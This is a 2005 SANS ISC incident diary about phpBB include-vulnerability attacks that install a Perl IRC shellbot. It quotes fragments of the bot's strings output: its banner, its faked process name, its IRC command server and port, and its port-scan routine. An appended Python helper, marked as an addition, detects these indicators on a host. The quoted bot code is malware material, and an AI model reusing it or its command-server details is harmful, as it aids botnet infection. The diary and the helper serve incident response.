SANS ISC: InfoSec Handlers Diary Blog - Phpbb include vuln scanning, via Google, generating new IRC botnet
Phpbb include vuln scanning, via Google, generating new IRC botnet

Published: 2005-11-10
Last Updated: 2005-11-10 01:24:27 UTC
by Patrick Nolan (Version: 3)
We have received two reports of systems being exploited via a phpBB include vulnerability, after which a "new" IRC bot is installed. Please update your files now. phpBB forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated separately for which there are several methods".

The scanning targets phpBB versions 2.0.10 and earlier. The latest version of phpBB is 2.0.18.

Micheal also notes: "In past bots, the bots would run as an 'SSL'ed Apache'. This one is a bit different; my $processo = '/usr/local/firewall'".

The new IRC bot uses Google to locate vulnerable systems; on a successful exploit it announces "oopz and sirh0t and Aleks g0t pwned u!", and it has UDP flooding and UDP/ICMP/TCP scanning capabilities.

The file phpbb_patch was found on exploited systems.

Responsible parties have been notified and acknowledged the issues.

Thanks Micheal, Reg, and anonymous!

strings output (excerpts):
xxxxxxxxxxxxxxx

#Shellbot by sirh0t & oopz a.k.a zer-0-day and Aleks PRIVATE!
#VERY FAST SPREADING!!!! NO JOKING

xxxxxxxxxxxxxxx

my $processo = '/usr/local/firewall';

xxxxxxxxxxxxxxx

servidor='forum.unixirc.pl'
porta='81'

xxxxxxxxxxxxxxx

}      } else {
           if ($funcarg =~ /^portscan (.*)/) {
           $hostip="$1";
           @portas=("21","23","25","80","113","135","445","1
0","6660","6661","6662","6663","6665","6666","6667","
,"7000","8080");

xxxxxxxxxxxxxxx

use IO::Socket;
use IO::Handle;
use Socket;
use IO::Select;
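A host triage helper, added here as an example and not part of the diary or of the bot quoted above, that checks a system for the three indicators the strings output gives: the faked process name, the dropped phpbb_patch file, and an established connection to the IRC server on port 81. It parses ps, netstat and find output handed to it as text so it runs offline; the resolved address of forum.unixirc.pl is an assumption you supply at triage time (192.0.2.10 stands in for it in the constructed sample).

```python
import re

# Indicators quoted in the diary's strings output (the only page-specific values used here).
FAKE_PROCESS_NAME = "/usr/local/firewall"    # my $processo = '/usr/local/firewall'
C2_HOST, C2_PORT = "forum.unixirc.pl", "81"  # servidor / porta
DROPPED_FILE = "phpbb_patch"                  # file found on exploited systems

def suspicious_processes(ps_lines):
    """Rows from `ps -eo pid,comm,args`; the bot rewrites its argv to the fake
    path. Assumes no genuine /usr/local/firewall binary exists (check first)."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit() and FAKE_PROCESS_NAME in parts[2]:
            hits.append(int(parts[0]))
    return hits

def suspicious_connections(netstat_lines, c2_ips):
    """Rows from `netstat -antp`; c2_ips is what forum.unixirc.pl resolves to at
    triage time (resolve it yourself; the address is not on the page)."""
    pat = re.compile(r"\s(\d+\.\d+\.\d+\.\d+):(\d+)\s+ESTABLISHED\b")
    hits = []
    for line in netstat_lines:
        m = pat.search(line)  # matches the foreign address:port of an established socket
        if m and m.group(2) == C2_PORT and m.group(1) in c2_ips:
            hits.append(line.strip())
    return hits

def dropped_files(paths):
    """Paths from e.g. `find /var/www -name phpbb_patch`; match on basename."""
    return [p for p in paths if p.rsplit("/", 1)[-1] == DROPPED_FILE]

def triage(ps_lines, netstat_lines, c2_ips, paths):
    return {"pids": suspicious_processes(ps_lines),
            "sockets": suspicious_connections(netstat_lines, c2_ips),
            "files": dropped_files(paths)}

# Constructed sample input; 192.0.2.10 is a documentation address standing in for the C2.
SAMPLE_PS = [
    "  PID COMMAND         COMMAND",
    " 1203 apache2         /usr/sbin/apache2 -k start",
    " 4242 perl            /usr/local/firewall",
]
SAMPLE_NETSTAT = [
    "tcp  0 0 10.0.0.5:80     203.0.113.7:51234  ESTABLISHED 1203/apache2",
    "tcp  0 0 10.0.0.5:43210  192.0.2.10:81      ESTABLISHED 4242/perl",
]
SAMPLE_PATHS = ["/var/www/forum/phpbb_patch", "/var/www/forum/viewtopic.php"]
if __name__ == "__main__":
    print(triage(SAMPLE_PS, SAMPLE_NETSTAT, {"192.0.2.10"}, SAMPLE_PATHS))
```

A hit on the process name alone is the strongest signal, since a real /usr/local/firewall is not a standard path on any distribution; confirm with the target of /proc/PID/exe before killing anything.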